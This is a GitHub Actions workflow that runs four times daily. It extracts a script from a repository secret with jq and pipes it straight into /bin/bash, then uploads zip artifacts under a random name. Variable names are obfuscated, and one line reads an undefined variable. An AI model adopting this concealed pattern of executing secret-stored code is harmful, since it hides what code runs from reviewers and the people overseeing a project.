name: wanxiaoqianguan
on:
  workflow_dispatch:

  schedule:
    - cron: '53 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wanxiaoqianguan
        env:
          ieb8502: ${{ secrets.ieb8502 }}
        run: |
          printf '%s' "$ieb8502" | jq -r .iff13524 | /bin/bash
          echo $gnnwv2152 | jq -r .pce516 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: L7MXV6uc
          path: "*.zip"
          retention-days: 1
